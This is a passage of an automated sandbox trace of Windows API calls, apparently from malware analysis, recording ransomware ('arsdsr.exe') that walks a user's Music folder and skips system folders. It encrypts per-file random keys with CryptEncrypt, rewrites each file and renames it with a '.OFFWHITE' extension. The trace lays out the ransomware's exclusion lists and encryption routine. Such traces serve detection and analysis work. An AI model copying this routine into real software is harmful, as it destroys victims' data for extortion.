HALPmcxz\\Music\\I4kPj\\Z54uS6dIPlPf.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Z54uS6dIPlPf.mp3" [0135.167] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.167] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.167] PathFindExtensionW (pszPath="Z54uS6dIPlPf.mp3") returned=".mp3" [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.167] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.167] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c45a180, ftCreationTime.dwHighDateTime=0x1d5e6f7, ftLastAccessTime.dwLowDateTime=0x1cde8a90, ftLastAccessTime.dwHighDateTime=0x1d5dc18, ftLastWriteTime.dwLowDateTime=0x1cde8a90, ftLastWriteTime.dwHighDateTime=0x1d5dc18, nFileSizeHigh=0x0, nFileSizeLow=0x160ec, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="ZNSOM-ccxidfZCPHVK.m4a", cAlternateFileName="ZNSOM-~1.M4A")) returned 1 [0135.167] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2=".") returned 1 [0135.167] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="..") returned 1 [0135.167] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="...") returned 1 [0135.167] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="windows") returned 1 [0135.167] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="$recycle.bin") returned 1 [0135.167] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="rsa") returned 1 [0135.167] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="ntuser.dat") returned 1 [0135.168] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="programdata") returned 1 [0135.168] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="appdata") returned 1 [0135.168] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="program files") returned 1 [0135.168] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="program files (x86)") returned 1 [0135.168] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.168] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="ZNSOM-ccxidfZCPHVK.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a" [0135.168] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.168] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.168] PathFindExtensionW (pszPath="ZNSOM-ccxidfZCPHVK.m4a") returned=".m4a" [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0135.168] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0135.168] lstrcmpiW (lpString1="ZNSOM-ccxidfZCPHVK.m4a", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.168] GetProcessHeap () returned 0x500000 [0135.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531910 [0135.169] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\znsom-ccxidfzcphvk.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.169] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=90348) returned 1 [0135.169] GetProcessHeap () returned 0x500000 [0135.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.169] GetProcessHeap () returned 0x500000 [0135.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.169] GetProcessHeap () returned 0x500000 [0135.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.169] GetProcessHeap () returned 0x500000 [0135.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.169] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.169] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.169] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.169] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.169] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.169] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.170] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.170] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.170] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.170] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.170] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.170] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.170] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.170] SetLastError (dwErrCode=0x0) [0135.170] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.172] GetLastError () returned 0x0 [0135.172] GetLastError () returned 0x0 [0135.172] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x161ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.172] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.172] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x162ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.173] WriteFile (in: hFile=0x21c, lpBuffer=0x531910*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x531910*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.173] GetProcessHeap () returned 0x500000 [0135.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x160ec) returned 0x55a7b8 [0135.173] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.173] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x160ec, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x160ec, lpOverlapped=0x0) returned 1 [0135.179] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.179] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x160ec, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x160ec, lpOverlapped=0x0) returned 1 [0135.180] GetProcessHeap () returned 0x500000 [0135.180] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.180] CloseHandle (hObject=0x21c) returned 1 [0135.182] GetProcessHeap () returned 0x500000 [0135.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.182] GetProcessHeap () returned 0x500000 [0135.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.182] GetProcessHeap () returned 0x500000 [0135.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.182] GetProcessHeap () returned 0x500000 [0135.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.182] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a" [0135.182] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a.OFFWHITE" [0135.182] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\znsom-ccxidfzcphvk.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\ZNSOM-ccxidfZCPHVK.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\znsom-ccxidfzcphvk.m4a.offwhite")) returned 1 [0135.183] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c45a180, ftCreationTime.dwHighDateTime=0x1d5e6f7, ftLastAccessTime.dwLowDateTime=0x1cde8a90, ftLastAccessTime.dwHighDateTime=0x1d5dc18, ftLastWriteTime.dwLowDateTime=0x1cde8a90, ftLastWriteTime.dwHighDateTime=0x1d5dc18, nFileSizeHigh=0x0, nFileSizeLow=0x160ec, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="ZNSOM-ccxidfZCPHVK.m4a", cAlternateFileName="ZNSOM-~1.M4A")) returned 0 [0135.183] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0135.183] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba21970, ftCreationTime.dwHighDateTime=0x1d5e609, ftLastAccessTime.dwLowDateTime=0x343a9b60, ftLastAccessTime.dwHighDateTime=0x1d5da07, ftLastWriteTime.dwLowDateTime=0x343a9b60, ftLastWriteTime.dwHighDateTime=0x1d5da07, nFileSizeHigh=0x0, nFileSizeLow=0x6772, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="ixEQR2kK9qrkUVqy7xY.m4a", cAlternateFileName="IXEQR2~1.M4A")) returned 1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2=".") returned 1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="..") returned 1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="...") returned 1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="windows") returned -1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="$recycle.bin") returned 1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="rsa") returned -1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="ntuser.dat") returned -1 [0135.183] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="programdata") returned -1 [0135.184] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="appdata") returned 1 [0135.184] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="program files") returned -1 [0135.184] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="program files (x86)") returned -1 [0135.184] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0135.184] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="ixEQR2kK9qrkUVqy7xY.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a" [0135.184] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.184] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.184] PathFindExtensionW (pszPath="ixEQR2kK9qrkUVqy7xY.m4a") returned=".m4a" [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0135.184] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0135.184] lstrcmpiW (lpString1="ixEQR2kK9qrkUVqy7xY.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.184] GetProcessHeap () returned 0x500000 [0135.184] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531920 [0135.185] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ixeqr2kk9qrkuvqy7xy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.186] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=26482) returned 1 [0135.186] GetProcessHeap () returned 0x500000 [0135.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.186] GetProcessHeap () returned 0x500000 [0135.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.186] GetProcessHeap () returned 0x500000 [0135.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.186] GetProcessHeap () returned 0x500000 [0135.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.187] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.187] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.187] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.187] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.187] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.187] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.187] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.187] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.187] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.187] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.187] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6772, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.187] SetLastError (dwErrCode=0x0) [0135.187] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.190] GetLastError () returned 0x0 [0135.190] GetLastError () returned 0x0 [0135.190] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6872, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.190] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.191] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6972, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.191] WriteFile (in: hFile=0xb0, lpBuffer=0x531920*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531920*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.191] GetProcessHeap () returned 0x500000 [0135.191] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6772) returned 0x55a7b8 [0135.191] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.191] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x6772, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x6772, lpOverlapped=0x0) returned 1 [0135.193] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.193] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x6772, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x6772, lpOverlapped=0x0) returned 1 [0135.194] GetProcessHeap () returned 0x500000 [0135.194] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.194] CloseHandle (hObject=0xb0) returned 1 [0135.203] GetProcessHeap () returned 0x500000 [0135.203] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.203] GetProcessHeap () returned 0x500000 [0135.203] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.203] GetProcessHeap () returned 0x500000 [0135.203] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.203] GetProcessHeap () returned 0x500000 [0135.203] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.203] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a" [0135.204] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a.OFFWHITE" [0135.204] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ixeqr2kk9qrkuvqy7xy.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\ixEQR2kK9qrkUVqy7xY.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ixeqr2kk9qrkuvqy7xy.m4a.offwhite")) returned 1 [0135.204] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12e353e0, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7298c490, ftLastAccessTime.dwHighDateTime=0x1d5debc, ftLastWriteTime.dwLowDateTime=0x7298c490, ftLastWriteTime.dwHighDateTime=0x1d5debc, nFileSizeHigh=0x0, nFileSizeLow=0x1cce, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="K9Pzz62DmAue9.mp3", cAlternateFileName="K9PZZ6~1.MP3")) returned 1 [0135.204] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2=".") returned 1 [0135.204] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="..") returned 1 [0135.204] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="...") returned 1 [0135.204] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="windows") returned -1 [0135.205] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="$recycle.bin") returned 1 [0135.205] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="rsa") returned -1 [0135.205] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="ntuser.dat") returned -1 [0135.205] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="programdata") returned -1 [0135.205] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="appdata") returned 1 [0135.205] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="program files") returned -1 [0135.205] lstrcmpiW (lpString1="K9Pzz62DmAue9.mp3", lpString2="program files (x86)") returned -1 [0135.205] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0135.205] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="K9Pzz62DmAue9.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\K9Pzz62DmAue9.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\K9Pzz62DmAue9.mp3" [0135.205] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.205] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.205] PathFindExtensionW (pszPath="K9Pzz62DmAue9.mp3") returned=".mp3" [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.205] lstrcmpiW (lpString1=".mp3", 